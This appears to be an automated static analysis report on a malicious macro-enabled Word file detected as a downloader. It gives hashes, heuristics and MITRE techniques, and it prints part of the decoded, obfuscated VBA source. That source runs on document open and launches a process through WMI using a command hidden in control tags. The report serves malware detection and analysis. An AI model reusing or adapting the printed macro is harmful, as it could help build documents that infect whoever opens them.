Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 efd5d956be09b1c3…

MALICIOUS

Office (OOXML)

123.1 KB Created: 2020-01-30 22:17:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2020-07-24
MD5: 6da0740507a9f113a98a738a359cd3c5 SHA-1: 8e0296c0b0f7e4fa15c06a7c1fa80327b4d7cd0c SHA-256: efd5d956be09b1c3792554581c4e4d7986b89de78eb4ff41368ef5a1a8f9a82a
262 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is an OOXML document containing VBA macros, specifically a Document_Open macro that calls GetObject. ClamAV signatures indicate it is a downloader. The VBA script attempts to construct a URL from concatenated strings, which is a common technique for downloading and executing further malicious content. The presence of the Document_Open macro and the ClamAV detection strongly suggest a malicious downloader.

Heuristics 6

  • ClamAV: Doc.Downloader.Chartres-7571094-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Chartres-7571094-0
  • VBA project inside OOXML medium 3 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 5454 bytes
SHA-256: f6b5ce3596a3def546a724b075d51071475f548662b15e8536154f403fc060a7
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Cwctnmyvbd"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
   iewrf = 887
sd = Trim _
(628)
f = Trim("{Polic}")
ffv = Trim("{Polic}")
r = Trim(764)
fe = Trim(Ytpgcxzvavh)
vfd = Trim("{Polic}")
nxss = Trim _
(161)
Ycyovwifgrcn.Okaeuivils
End Sub


Attribute VB_Name = "Fndxrfslxgve"
Attribute VB_Base = "0{D16E3868-9E80-448D-8611-85DF4EDB6E7B}{6984B8D1-E7C3-46C1-BF17-90E3F6594909}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Qkvsdnvnyi"
Attribute VB_Base = "0{3E6EC26A-52C2-49A4-9801-BEAFE8C26AA9}{8C2CE0DD-550B-45BB-99EB-28C01B1BA9F7}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Rrrvqhzrs()
Debug.Print "Operaion" + NS + "S"
End Sub

Attribute VB_Name = "Ycyovwifgrcn"
Function Okaeuivils()
   iewrf = 866
sd = Trim _
(807)
f = Trim("{Polic}")
ffv = Trim("{Polic}")
r = Trim(892)
fe = Trim(Utuowuunkpplr)
vfd = Trim("{Polic}")
nxss = Trim _
(818)
Jtdtdpqakv = "==/e3n//3^w==/e3n//3^==/e3n//3^==" + "/e3n//3^i==/e3n//3^==/e3n//3^" + "nmg==/e3n//3^mt==/e3n//3^==/e3n//3^" + ChrW(Int(wdKeyS)) + "==/e3n//3^:w==/e3n//3^in==" + "/e3n//3^==/e3n//3^3==/e3n//3^2_" + Fndxrfslxgve.Wwplzstpxan + "ro==/e3n//3^ce==/e3n" + "//3^==/e3n//3^s==/e3n//3^s"
   iewrf = 231
sd = Trim _
(649)
f = Trim("{Polic}")
ffv = Trim("{Polic}")
r = Trim(678)
fe = Trim(Wmxnglpagm)
vfd = Trim("{Polic}")
nxss = Trim _
(731)
Aafbevnv = Vgmqrjqpk(Jtdtdpqakv)
   iewrf = 478
sd = Trim _
(514)
f = Trim("{Polic}")
ffv = Trim("{Polic}")
r = Trim(371)
fe = Trim(Rirabsmkkfxi)
vfd = Trim("{Polic}")
nxss = Trim _
(435)
Set Axcbeuys = GetObject(Aafbevnv)
   iewrf = 780
sd = Trim _
(867)
f = Trim("{Polic}")
ffv = Trim("{Polic}")
r = Trim(321)
fe = Trim(Tvepinizjcj)
vfd = Trim("{Polic}")
nxss = Trim _
(983)
Xoqkavshpbmny = Fndxrfslxgve.Jxakuyofhkh.Tag
   iewrf = 143
sd = Trim _
(44)
f = Trim("{Polic}")
ffv = Trim("{Polic}")
r = Trim(342)
fe = Trim(Xwvpilwtmrfe)
vfd = Trim("{Polic}")
nxss = Trim _
(758)
Bbyzyzgtfpkay = Aafbevnv + ChrW(Int(wdKeyS)) + Fndxrfslxgve.Igfzstdelys.Tag + Xoqkavshpbmny
   iewrf = 277
sd = Trim _
(378)
f = Trim("{Polic}")
ffv = Trim("{Polic}")
r = Trim(368)
fe = Trim(Wqaoxpvrzve)
vfd = Trim("{Polic}")
nxss = Trim _
(174)
Wxtrbnffdplqs = Bbyzyzgtfpkay + Fndxrfslxgve.Wwplzstpxan
   iewrf = 891
sd = Trim _
(766)
f = Trim("{Polic}")
ffv = Trim("{Polic}")
r = Trim(826)
fe = Trim(Ffmotmfj)
vfd = Trim("{Polic}")
nxss = Trim _
(127)
Call Axcbeuys. _
Create(Vgkjubamnr, Uxlpjxpqpznv, Nylnjroxyq(Wxtrbnffdplqs), Ujrtzvniob, Gkrwfuowfqigl, Uahpdidw)
   iewrf = 474
sd = Trim _
(42)
f = Trim("{Polic}")
ffv = Trim("{Polic}")
r = Trim(841)
fe = Trim(Pjzbnflwrrnl)
vfd = Trim("{Polic}")
nxss = Trim _
(671)
End Function
Function Nylnjroxyq(Kpetbfrzfuzas)
   iewrf = 634
sd = Trim _
(395)
f = Trim("{Polic}")
ffv = Trim("{Polic}")
r = Trim(657)
fe = Trim(Ropaqbikl)
vfd = Trim("{Polic}")
nxss = Trim _
(920)
Set Nylnjroxyq = GetObject(Kpetbfrzfuzas)
   iewrf = 890
sd = Trim _
(444)
f = Trim("{Polic}")
ffv = Trim("{Polic}")
r = Trim(94)
fe = Trim(Sisswxzv)
vfd = Trim("{Polic}")
nxss = Trim _
(565)
Nylnjroxyq. _
showwindow = Pcieljkk + Fysttgsddbk
   iewrf = 408
sd = Trim _
(854)
f = Trim("{Polic}")
ffv = Trim("{Polic}")
r = Trim(98)
fe = Trim(Gwkiayfvjcoya)
vfd = Trim("{Polic}")
nxss = Trim _
(300)
End Function
Function Vgmqrjqpk(Ljcjkljasd)
   iewrf = 861
sd = Trim _
(162)
f = Trim("{Polic}")
ffv = Trim("{Polic}")
r = Trim(914)
fe = Trim(Ym
... (truncated)
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 42496 bytes
SHA-256: 54c9054099de1624ee68ee0fab94b4e8a420e2170c7fc41f35a59aeb5070d2df
Detection
ClamAV: Doc.Downloader.Chartres-7571094-0
Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.